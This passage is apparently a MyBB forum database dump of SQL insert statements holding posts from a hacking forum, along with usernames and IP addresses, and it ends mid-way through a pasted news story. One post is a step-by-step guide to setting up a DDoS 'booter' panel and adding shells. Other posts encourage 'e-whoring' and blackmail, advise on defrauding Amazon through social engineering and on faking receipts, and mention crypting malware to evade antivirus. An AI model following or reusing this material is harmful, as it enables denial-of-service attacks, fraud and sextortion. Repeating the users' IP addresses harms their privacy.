'c2840fcc63e52f314f5b4c4c5eefa862', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('708', '191', '666', '15', 'RE: ProDos v1.0', '0', '1', 't3h jok3r', '1345769465', 'Twice? I\'m downloading this shit right now.', '41.150.193.50', '697745714', '1', '0', '0', '0', '1', '07a95f913ade3c2089c6ddc06730e8a4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('709', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1345769713', '@Timmy it is like that. =] /me has le swag required for Swag Award.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7b3f5b419cf1f21ee25dbf2fb393ed65', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('710', '173', '568', '14', 'RE: [TUT] Staying Anonymous', '0', '4', 'Triple H', '1345769858', 'Nice thread, i wish i could rep. i heard hidemyass sucks and i can\'t use hidemyass.', '41.151.163.157', '697803677', '1', '0', '0', '0', '1', 'c9d72c7deecf3958ad6d85d8604584da', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('711', '123', '305', '14', 'RE: Top 10 free VPNs', '0', '4', 'Triple H', '1345769909', 'Thanks for the list rom, you have always posted the best tutorials.', '41.151.163.157', '697803677', '1', '0', '0', '0', '1', 'b8c23bf8c586331a739b70fcc3a5f2e6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('712', '143', '372', '21', 'RE: Tiny flood', '0', '4', 'Triple H', '1345770206', 'I like the GUI. All self made programs are simple but very useful.', '41.151.163.157', '697803677', '1', '0', '0', '0', '1', '3e8834259d7b101f26901611d4f3a3ff', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('713', '198', '0', '21', '[Tutorial] Setting up your own web Booter[Source Included]', '0', '4', 'Triple H', '1345770454', '[size=medium][align=center]How to Setup your own Client Booter[/align][/size] [size=xx-small][align=center]Step by Step![/align][/size] Source Code Download: http://uppit.com/j6h89tqegdt8/Prodigys_Booter_SRC_Release.rar [size=medium][u] How to Setup Your Host[/u][/size] [size=medium][u]DO NOT USE 000WEBHOST, YOU NEED A OFFSHORE HOST[/u][/size] 1) Please Sign-Up at 000Webhost. 2) Please Click on \"Create New\" and make a new website. [img]http://vvcap.net/db/6KPPuGYwz9I91r1FoXrP.png[/img] 3) Fill in the information, with the Booter domain you want. [img]http://vvcap.net/db/B0hbS4Wa2RWz9rPSSp5D.png[/img] 4) You will now get the following Message. [img]http://vvcap.net/db/zwr9ogi3AQ-4MFXfNKaV.png[/img] 5) Now, go to your cPanel, and scroll down to where it says \"SQL\" [img]http://vvcap.net/db/W7tg2oIJTYV5O1jiqvo-.png[/img] 6) Click onto SQL. 7) Create a SQL database, and[color=#FF0000][u] SAVE THE INFORMATION[/u][/color] [img]http://vvcap.net/db/1eGcUQyvl1AJzgmd-7fc.png[/img] [size=medium][u]Step One[/u][/size] 1) Setup Your Webhost. 2) Setup your SQL Database. 3) Get your Webhost Information Ready. 4) Get your SQL Information Ready. [size=medium][u]Step Two[/u][/size] [u]Your FTP Information can be found by going to the \"Files\" section, and click \"View FTP details\"[/u] [img]http://vvcap.net/db/iHKssvjYq99cRPz0j3tX.png[/img] 1) Upload all your files to your FTP. 2) Go to the \"dbc.php\" 3) Download it to your Desktop, and open with Notepad++ [img]http://vvcap.net/db/JbxJX1w-krsxBahHNGjZ.png[/img] 4) Look for the Following Information [code] define (\"DB_HOST\", \"YOURSQLHOST\"); // set database host define (\"DB_USER\", \"YOURSQLUSER\"); // set database user define (\"DB_PASS\",\"PASSWORD\"); // set database password define (\"DB_NAME\",\"DBNAME\"); // set database name [/code] 5) Replace all the Information, Like your Database Host,Username.Password and name. 6) Go to your PHPMYADMIN, and click \"import\" on the top, then in the Web-Files folder of the booter, select the \"dbprepare.sql\" file, and load it into the SQL. [size=medium][u]Step Three[/u][/size] 1) Your Website and Booter is now live! 2) Go to Your Website, www.YourWebsite.com/login.php <---- 3) Please make sure to add the /login.php 4) Click on \"Register\" , and make a account. [size=medium][u]Step Four[/u][/size] 5) Go to your SQL. 6) Go to your PHPMYADMIN. 7) Go onto the table that your Booter is on. 8) Find the account\'s Table. 9) Find your Account. 10) Change Your Activation Level from \"0\" to \"1\" 11) Change Your User Level from \"1\" to \"5\" Done! You have now successfully setup your own booter!, to add shells please go to the \"Add Shell page\".', '41.151.163.157', '697803677', '1', '0', '0', '0', '1', 'c846da643bf2a0bfdb7b1b762e7e9acc', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('714', '199', '0', '25', '[Guide]How to protect your identity[Well-detailed]', '0', '4', 'Triple H', '1345770762', 'I will not guarantee 100% assurance that if you follow my tips, you will be entirely untraceable, but your percentage will increase dramatically. The information I will provide might make you paranoid by the time you are done reading this, so if you don\'t want to be informed and paranoid, please don\'t read this. [color=#00BFFF][size=large]I will be covering:[/size][/color] [color=#FFA500][size=medium] 1) History - Hackers 2) Website owners 3) Your name 4) Your e-mail 5) What you sign up to 6) Information you expose unknowingly 7) Keeping you safe[/size][/color] [color=#FFA500]You hear it on the news, you read it on the newspaper, you live with it everywhere without even acknowledging its existence. \"Hackers have stolen identities\" I have heard that line so many times this year, it is ridiculous. Companies promising to \"defend\" your identity, memberships giving their words to keep your information to themselves only, the government reassuring that they will only have access. All this[size=medium] is a lie [/size]as information ALWAYS gets leaked or there is an inside worker providing information out into the black market. [/color] Not only that, but securities on big companies are always exposed and hackers always find their way in. [color=#00BFFF][size=x-large]1) History - Hackers[/size][/color] [color=#FFD700][b]I will explain briefly on the type of hackers that there are out there for the sake of academical knowledge. These descriptions are not in dept, instead they are meant to slightly touch the subject and educate those are who are unaware of these titles on the cyber world. 1) Black Hat Hackers - These are the most infamous hackers there are. These are the guys you hear about it on the news due to committing crimes. These people are whose purpose is to gain information and use for their own need. They could be anyone. -Black Hats tend to be professionals at what they do and are extremely well informed on everything related with the cyber world and crimes. -Black Hats tend to be educated people who have worked many years to accumulate all the knowledge they hold. They are not your kid who uses \"hacking tools\" to scare their gaming buddies online. -Black Hats is the image typically portrayed on movies. 2) White Hat Hackers - These are the lesser known hackers simply because they do the clean up work that goes behind the scenes cleaning up the messes from Black Hat Hackers. -White Hats are the heroes of the cyber world. They fight crime using their hacking knowledge to patch exploits on system and assure that your information does not gets leaked out or easily acquired by any Black Hats. -White Hats are professionals at what they do. They have as much knowledge as Black Hats, but use their skills to fight crime rather than aid it. 3) Gray Hat Hackers - These are the somewhat known hackers simply because they are unpredictable on what their actions might turn into. They are known as \"Gray Hats\" because it\'s a mixture between the color White + Black = Creating: Gray -Gray Hats are essentially neutrals on what they do. They might decide to do what\'s right even if there\'s some other entity telling them that it\'s wrong or could be vice versa. For example, Black Hat steals bank information and leaks out on the internet. Gray Hat could either decide to either use the information OR let the owners, authorities, or the companies know of the exposure. [/b][/color] [color=#00BFFF][size=x-large]2) Website owners[/size][/color] [color=#FFD700][b]Websites, there are millions of them around the world in all languages. You can keep yourself entertained on them or you can become smarter reading potential useful information as you are reading now. :thumbsup: Do you ever wonder \"Who owns this website?\" or \"How can I find out who owns it?\" I decided to include this topic on here since more and more people decide to pay for hosting services to have their very own website for either personal usage or some sort of business. Well, unlike in the real world where you fill out papers and they get stacked or hidden in some compartment where not a random person could have access. Websites expose your information unknowingly. Maybe not the websites themselves, but the companies that provide hosting services. I will use this website \"HackForums.net\" as an example to teach what I\'m talking about. There is something known as a \"whois\" that essentially tells you who registered the domain name. You can easily Google \"whois domain\" and a huge list of websites that allow you to whois either a location or a domain to find its location. My favorite website to do whois is: http://whois.domaintools.com/ Now, if we do a whois on HackForums.net, here\'s what we get. [/b][/color] [color=#FFD700][b]As you can see it exposes a lot of information that you wouldn\'t want strangers to get a hold of you and then use to sell for their own good. HackForums.net is registered as a \"Private\" domain, so no real information is shown of the real owner. Instead, it displays the information of the company providing the service for the domain or hosting. This is also how you can contact a company if you want to report a website with disgusting content such as child pornography. I\'m not going to whois a person\'s website since it would be against the rules to expose personal information about anyone, but I believe that you get the idea of what can be done to discover information such as address, name, phone number, fax number, and more using nothing but a website name. Experienced website administrators always should use Private domains to avoid exposing information to the public as much as possible. If you have a website, whois it yourself and find out whether if you are exposed or not. If you are, call the company you registered your domain and request your domain to be put as private. They might require a fee of around $7 extra a year, but it\'s worth it knowing that you\'re not exposed. You could also find out the ISP or company by doing a ping on an IP. Example, Open Command Prompt and type \"ping Hackforums.net\" the response will be an IP. Once you have that IP, you can use: http://iplocation.net/ To tell you where the servers are located and giving you a definite location for the company\'s machines. http://iplocation.net/ Can also be used to find the location of a person\'s location with their IP. [/b][/color] [color=#00BFFF][size=large]3) Your name[/size][/color] [color=#FFA500][b]Your name is as unique as you can be. Your parents/guardians named you and that\'s what makes you, you. Your name can be your worst enemy when you are online as it can be used to expose so much information about you to the point of where you could be blackmailed. Where should you ever use your real name online? NEVER. Why? Because, using your name alone anyone can find out where you live within a matter of 5 seconds. Websites such as: http://com.lullar.com/ http://www.pipl.com/email/ http://www.spokeo.com http://www.emailfinder.com http://extremetracking.com/ http://www.411.com/ http://www.ask.com/ http://www.bebo.com/ http://www.facebook.com/ http://www.flickr.com/ http://www.ip-adress.com/ipaddresstolocation/ http://www.myspace.com/ http://www.myyearbook.com/ http://www.searchenginez.com/findpeople.html http://www.skipease.com/ http://www.sonico.com/ http://www.spock.com/ http://www.twitter.com/ http://www.usatrace.com/ http://www.whitepages.com http://www.whois.com/ http://www.whois.net/ http://www.wink.com/ http://www.youtube.com http://www.zabasearch.com/ http://www.zoominfo.com Make it extremely easy to search names, e-mails, etc to dig information about whoever you want. There are more websites in which I personally use to dig information about people, but I will not mention them since I do not want the news station going crazy on a new rage of identity exposers. [/b][/color]:blackhat: Here\'s an example of a person I searched for the sake of showing. [img]http://img130.imageshack.us/img130/332/identity.png[/img] [b][color=#FFA500]I have satellite pictures using Google Earth to pinpoint exactly where she lives and what her house looks like, but I will not expose that. Where is this information normally exposed? Hmm...I\'ll let you guess. Or maybe not...The answer is Social Networks. Ah, Facebook, Myspace, Orkut, and so many others...The list goes on and on. I highly recommend that you NEVER use your real name, instead use an edited name or initials instead rather than exposing your real name to the real world. If your friends on social networks already know you, they should not need to see your complete name as they will already know you. For example, Bill Gates My recommendation would be to use \"Billy Gates\" simply because a letter being off makes it so incredibly difficult to pinpoint someone. You can use your imagination for what you should replace your name instead of your real name. That is, if you want to avoid being looked up. Something I have found based on experience is that it\'s much more difficult pinpointing teenagers on the internet since they are not normally registered with government database that eases finding them. If you are a teenager, do not have your parents names exposed as the name of your parents can be used to pinpoint you or vice versa, if you are a parent. Ironically, it\'s the teenagers that expose more information than adults and yet, they are the ones harder to pinpoint.[/color][/b] [color=#00BFFF][size=large]4) Your e-mail[/size][/color] [color=#FFD700][b]Your e-mail, the one you use to check on your everyday business or activities online. The one you rely to deliver things to you safely. Question is, are you delivering to it safely? Probably not, or at least I hope you are. The e-mail problem is an easy fix since all it takes is common sense. If you have various accounts such as Social networks, have an e-mail specifically for messing around. If you have accounts for serious business such as your Paypal, Bank, etc... Have an e-mail that only you have access to and is different from your regular \"messing around\" e-mail. If you work for any companies or have services with an ISP, avoid using their e-mail services to register on important websites where your money is dealt with such as Paypal, AlertMoney, banks, etc... Why? Because they have been known to get hacked leaving all your information exposed for hackers to gorge in. Instead, I would recommend focusing on big companies such as Yahoo, Hotmail, or Gmail since these are much more secured companies and will always be up 24/7 any time of the year. Not much to say on that, just have different e-mails for different activities for security measures. Not only that, but also have different passwords that require extensive typing with various complicating symbols such as: you%(3cool That above is a ridiculous example, but I believe you get the idea. You know what hackers love the most? Not having to do much work and having everything set for them easily for the taking. For example, if you are infected with a keylogger, a hacker would love to have 1 e-mail to have access to everything. So, this gives you an idea why you should have a variety at all times with up-to-date information to assure that you could retrieve it, in case if it were to get stolen. [/b][/color] [color=#00BFFF][size=large]5) What you sign up to[/size][/color] [color=#FFD700][b]Ever wondered why you get so much spam e-mails? Well, it\'s simple. It\'s because e-mail collectors acquire a list of e-mails in which they can mass e-mail to send spam. Just as I mentioned earlier, have an e-mail for messing around and e-mails for serious business. Avoid using an e-mail for all activities as this will only clog your inbox with useless e-mails that will steal your valuable time. There are many websites which sell their database of e-mails to E-mail spammers for a certain amount of money behind the scenes or the collectors themselves have set traps through the internet such as Phishing to acquire a list of e-mails to spam. Avoid registering to websites such as products and random useless subjects that promise to pay you money for signing up or trying their products. Seems to me like it\'s common sense, but it\'s good to know. [/b][/color] [color=#00BFFF][size=large]6) Information you expose unknowingly [/size][/color] [color=#FFD700][b]Well, I hope that I have given you a good idea of easily information can be acquired using the internet. Privacy does not exists anymore on the internet. If you use Social Networks, try to have your information concealed as much as possible from the public and do not expose valuable information such as Birthday, location, or name to keep yourself as underground as possible. You have to consider that information could be leaked physically or electronically as well. Keep yourself up-to-date and informed to know if a company you might use has been breached or not. http://en.wikipedia.org/wiki/Timeline_of_computer_security_hacker_history As they say, Google is your friend. Use it when you need it.[/b][/color] [color=#00BFFF][size=large]7) Keeping you safe[/size][/color] [color=#FFD700][b] This is probably the most important part of the tutorial as this is where the most incidents occur due to infections or traps. Infections or traps can range from: -RATs (Remote Access Tool) which essentially give completely control of your computer. -Keylogging which retains a log of all the keys you ever press on your keyboard. -Phishing which retains a log when you manually input your information on a fake website emulating an original website. -And more, but those above are the most common. How can you protect yourself? Around 90% of malware on the internet was coded to infect Windows Operating systems. I got that number from PC World about a year ago, forgive me if it\'s incorrect now. Anyway, assuming that you run on Windows you are the ones are the highest risk of getting targeted or infected. You will want to always have your computer clean and secured having the proper tools. All these tools are the best of the best and are all free. They are probably better than paid security software. How do I know this? Well, there are websites where you can scan malware after you crypt them (making them undetectable) to ensure that they are not detected by Anti-virus of any kind. Avira is the one that people always have a hard time bypassing, so I can safely say that it\'s the best from my personal experience of crypting and scanning. Download and install all these tools below and I can assure you that your computer will be protected 1000% better than what it might be as of now. Get the free versions. http://www.malwarebytes.org/ http://personalfirewall.comodo.com/ [url=http://www.hackforums.net/showthread.php?tid=1176530]Avira Anti-Virus[/url] - Follow the instructions on that link on how to get it free. [url=http://www.hackforums.net/showthread.php?tid=881241&highlight=keyscrambler]KeyScrambler Pro 2.7[/url] - Follow the instructions on that link on how to get it for free. This software helps to encrypt everything you type on the internet. If you use Google Chrome, get this: https://chrome.google.com/extensions/detail/flcpelgcagfhfoegekianiofphddckof?hl=en It encrypts all your website visits as https:// rather than http:// which makes you more secured. If you use Firefox, get this: http://www.eff.org/https-everywhere It encrypts all your website visits as https:// rather than http:// which makes you more secured as well. http://notendur.hi.is/~gas15/FireShepherd/ FireShepherd, a small console program that floods the nearby wireless network with packets designed to turn off FireSheep, effectively shutting down nearby FireSheep programs every 0.5 sec or so, making you and the people around you secure from most people using FireSheep. The program kills the current version of FireSheep running nearby, but the user is still in danger of all other session hijacking mechanisms. Do not do anything over a untrusted network that you cannot share with everyone. -Know that this is only a temporary solution to the FireSheep problem, created to give people the chance to secure themselves and the others around them from the current threat, while the security vulnerabilities revealed by FireSheep are being fixed. The other option is using a different operating system which has a lower percentage of being targeted. You don\'t have to spend tons of money on Apple computers, instead you can get a free operating system from the Linux distributions. The easiest to use and most similar to Windows looks is Ubuntu. You can install Ubuntu as a normal program on Windows and once it restarts, it shows you the option to choose Ubuntu over Windows. You can watch this video: http://www.youtube.com/watch?v=UdI8_92QTkQ To learn more in dept. It\'s very simple, so don\'t be afraid to try. The video focuses on completely replacing your current operating system Windows and replacing it or dual booting with Linux Ubuntu. If you are a noobie, I would recommend you stop at the part where he goes to: [url=http://www.wubi-installer.org]Wubi Installer - Ubuntu[/url] It\'s as simple as going Next, next, next on any normal installation and whenever you restart your computer, it will ask you to choose either Ubuntu or Windows. Running under a Linux distribution will put you at around a 2-5% of getting infected with anything. Not only is Linux good, but you don\'t have to worry much about installing anti-virus or anti-malware software to keep your computer clean and running. I have been running on Backtrack 4 R2, a Linux Distribution and I can tell you that I have NEVER been infected. [/b][/color] [size=small]Credits: Developer[/size]', '41.151.163.157', '697803677', '1', '0', '0', '0', '1', '12f519ad17216642d66463093c5fe8a9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('715', '151', '399', '24', 'RE: Windows 8/Ubuntu/Android Themes For XP, Vista, Win7 x32 & x64', '0', '1', 't3h jok3r', '1345770943', 'Now you are being clear [b]RACIST[/b] to windows 7, because there are no urls for windows 7.', '41.151.163.157', '697803677', '1', '0', '0', '0', '1', '8a8aa0670a65a6799262621a2edeb63d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('716', '32', '645', '16', 'RE: [tut]How to SE Amazon Kindles', '0', '10', 'swa4567', '1345771883', '[quote=\'GRONgamer61\' pid=\'645\' dateline=\'1345684691\'] alrighty I\'m kinda scared. I just did this, they are sending a replacement but they have told me that I have to send broken one back, which I obviously cant do. What do I do???? [hr] If I don\'t in thirty days they will charge the credit care(VCC), I could care less about that, but they have my address? [/quote] Don\'t worry, they won\'t do anything with your address. Most likely charge your VCC. Don\'t worry about sending the broken one in.', '41.151.193.77', '697811277', '0', '0', '0', '0', '1', 'c1561fb379fdff2c3bea2c0692b32f10', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('717', '194', '681', '16', 'RE: So i got this from redbull.', '0', '10', 'swa4567', '1345771987', 'As far as I know, Redbull is a drink. So you can say, you threw the receipt away. Take any popular stores name (EX: walmart, walgreen). Say what day you bought it on, but do not give them the time. You can either say you threw the can away or you can go to your nearest store and get the code.', '41.151.193.77', '697811277', '0', '0', '0', '0', '1', 'f6274d78a39bf28ac2f955f9fcaffa97', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('718', '26', '676', '17', 'RE: [tut]How to E-Whore, Blackmail with pics and safety tips.', '0', '1', 't3h jok3r', '1345772070', '[quote=\'iTzIpod\' pid=\'676\' dateline=\'1345752102\'] I never tried E-Whoring before. :/ I want to try it! [/quote] Give it a try, I bet you will succeed and I have been a pro in this shit so you have someone on LH for answers to your question(s)', '41.151.193.77', '697811277', '1', '0', '0', '0', '1', 'ca7630989d030519c68c42b00814fb3e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('719', '32', '87', '16', 'RE: [tut]How to SE Amazon Kindles', '0', '100', '??zg???g????61', '1345772262', 'Oh cool thanks, I think I just relaxed a whole lot more.', '72.95.89.224', '1214208480', '1', '0', '0', '0', '1', 'ec73efe4d965ebc97c76b13bcebf18a4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('720', '193', '677', '59', 'RE: 150+ Free Hacking eBooks Collection', '0', '100', '??zg???g????61', '1345774110', 'the Network Security download is locked with a password... --...--', '72.95.89.224', '1214208480', '1', '0', '0', '0', '1', '20d1493c564931207354bc8feb684b68', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('721', '197', '696', '56', 'RE: /me Thread', '0', '100', '??zg???g????61', '1345774401', '/me Hello(; -=-=-=-=-=-=-=-=-=-=-=-', '72.95.89.224', '1214208480', '1', '0', '0', '0', '1', 'c38ff1f123a1860de4524f482417a209', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('722', '197', '696', '56', 'RE: /me Thread', '0', '20', 'JakeUS', '1345775015', '/me JakeUS is a Staff member?', '24.59.243.229', '406582245', '1', '0', '0', '0', '1', 'cc2095d91cddf1862cdf1fbabe849f53', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('723', '200', '0', '55', '[Request] Adobe Photoshop CS6 Portable', '0', '82', 'iTzIpod', '1345776608', 'Hey LH, I would like a request of Adobe Photoshop CS6 Portable please. =] I am currently using Adobe Photoshop CS4 but I need the latest version. Thanks in advance. NOTE: - Add a virus scan please. - Please test the file first before giving me the download link.I don\'t want a virus on my computer. - Don\'t give survey links.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '25ac6d85c7ae0ae491ffdb8f2fbbc15a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('724', '189', '652', '49', 'RE: Webmaster Section', '0', '54', 'Sin Cara', '1345781976', 'Ok i understand what you want to say. ;)', '119.154.12.80', '2006584400', '1', '0', '0', '0', '1', 'aad85ae5e382cd9d639f801e1db2de5f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('725', '139', '669', '12', 'RE: Get 60 Minutes skype credit FREE!', '0', '54', 'Sin Cara', '1345782029', '[quote=\'iTzIpod\' pid=\'669\' dateline=\'1345749545\'] Still temporarily unavailable! :/ Been 2 days. [/quote] Just wait otherwise i will close thread.', '119.154.12.80', '2006584400', '1', '0', '0', '0', '1', '87909b8dcb0460085f72bc65cf235703', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('726', '151', '715', '24', 'RE: Windows 8/Ubuntu/Android Themes For XP, Vista, Win7 x32 & x64', '0', '54', 'Sin Cara', '1345782459', '[quote=\'t3h jok3r\' pid=\'715\' dateline=\'1345770943\'] Now you are being clear [b]RACIST[/b] to windows 7, because there are no urls for windows 7. [/quote] But it worked fine for me ;)', '119.154.12.80', '2006584400', '1', '0', '0', '0', '1', 'b6363571ab90ae34ac1ebc4d788608eb', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('727', '201', '0', '42', 'Lance armstrong stripped of 7 tour titles?', '0', '61', 'NXK', '1345783095', 'USTIN, Texas (AP) -- With stunning swiftness, the U.S. Anti-Doping Agency said Thursday night it will strip Lance Armstrong of his unprecedented seven Tour de France titles after he dropped his fight against drug charges that threatened his legacy as one of the greatest cyclists of all time. Travis Tygart, USADA\'s chief executive, said Armstrong would also be hit with a lifetime ban on Friday. And under the World Anti-Doping Code, he would lose the bronze medal from the 2000 Olympics as well as any awards, event titles and cash earnings. Armstrong, who retired last year, effectively dropped his fight by declining to enter USADA\'s arbitration process - his last option - because he said he was weary of fighting accusations that have dogged him for years. He has consistently pointed to the hundreds of drug tests he passed as proof of his innocence while piling up Tour titles from 1999 to 2005. \'\'There comes a point in every man\'s life when he has to say, \'Enough is enough.\' For me, that time is now,\'\' Armstrong said. He called the USADA investigation an \'\'unconstitutional witch hunt.\'\' \'\'I have been dealing with claims that I cheated and had an unfair advantage in winning my seven Tours since 1999,\'\' he said. \'\'The toll this has taken on my family and my work for our foundation and on me leads me to where I am today - finished with this nonsense.\'\' USADA reacted quickly and treated Armstrong\'s decision as an admission of guilt, hanging the label of drug cheat on an athlete who was a hero to thousands for overcoming life-threatening testicular cancer and for his foundation\'s support for cancer research. \'\'It is a sad day for all of us who love sport and athletes,\'\' Tygart said. \'\'It\'s a heartbreaking example of win at all costs overtaking the fair and safe option. There\'s no success in cheating to win.\'\' Tygart said the agency had the power to strip the Tour titles, though Armstrong disputed that. \'\'USADA cannot assert control of a professional international sport and attempt to strip my seven Tour de France titles,\'\' he said. \'\'I know who won those seven Tours, my teammates know who won those seven Tours, and everyone I competed against knows who won those seven Tours.\'\' Still to be heard from was the sport\'s governing body, the International Cycling Union, which had backed Armstrong\'s legal challenge to USADA\'s authority and in theory could take the case before the international Court of Arbitration for Sport. Tygart said UCI was \'\'bound to recognize our decision and impose it\'\' as a signer of the World Anti-Doping Code. \'\'They have no choice but to strip the titles under the code,\'\' he said. USADA maintains that Armstrong has used banned substances as far back as 1996, including the blood-booster EPO and steroids as well as blood transfusions - all to boost his performance. The 40-year-old Armstrong walked away from the sport in 2011 without being charged following a two-year federal criminal investigation into many of the same accusations he faces from USADA. The federal probe was closed in February, but USADA announced in June it had evidence Armstrong used banned substances and methods - and encouraged their use by teammates. The agency also said it had blood tests from 2009 and 2010 that were \'\'fully consistent\'\' with blood doping. Included in USADA\'s evidence were emails written by Armstrong\'s former U.S. Postal Service teammate Floyd Landis, who was stripped of his 2006 Tour de France title after a positive drug test. Landis\' emails to a USA Cycling official detailed allegations of a complex doping program on the team. USADA also said it had 10 former Armstrong teammates ready to testify against him. Other than suggesting they include Landis and Tyler Hamilton, both of whom have admitted to doping offenses, the agency has refused to say who they are or specifically what they would say. \'\'There is zero physical evidence to support (the) outlandish and heinous claims,\'\' Armstrong said. \'\'The only physical evidence here is the hundreds of (doping) controls I have passed with flying colors.\'\' Armstrong sued USADA in Austin, where he lives, in an attempt to block the case and was supported by the UCI. A judge threw out the case on Monday, siding with USADA despite questioning the agency\'s pursuit of Armstrong in his retirement. \'\'USADA\'s conduct raises serious questions about whether its real interest in charging Armstrong is to combat doping, or if it is acting according to less noble motives,\'\' such as politics or publicity, U.S. District Judge Sam Sparks wrote. Even if UCI and USADA differ on the Tour titles, the ultra-competitive Armstrong has still done something virtually unthinkable for him: He quit before a fight is over. It was a stunning move for an athlete who built his reputation on not only beating cancer, but forcing himself through grueling offseason workouts no one else could match, then crushing his rivals in the Alps and the Pyrenees. \'\'Today I turn the page. I will no longer address this issue, regardless of the circumstances,\'\' he said. \'\'I will commit myself to the work I began before ever winning a single Tour de France title: serving people and families affected by cancer, especially those in underserved communities.\'\' Armstrong could have pressed his innocence in USADA\'s arbitration process, which would have included a hearing during which evidence against him would have been presented. But the cyclist has said he believes most people have already made up their minds about whether he\'s a fraud or a persecuted hero. Although he had already been crowned a world champion and won individual stages at the Tour de France, Armstrong was still relatively unknown in the U.S. until he won the epic race for the first time in 1999. It was the ultimate comeback tale: When 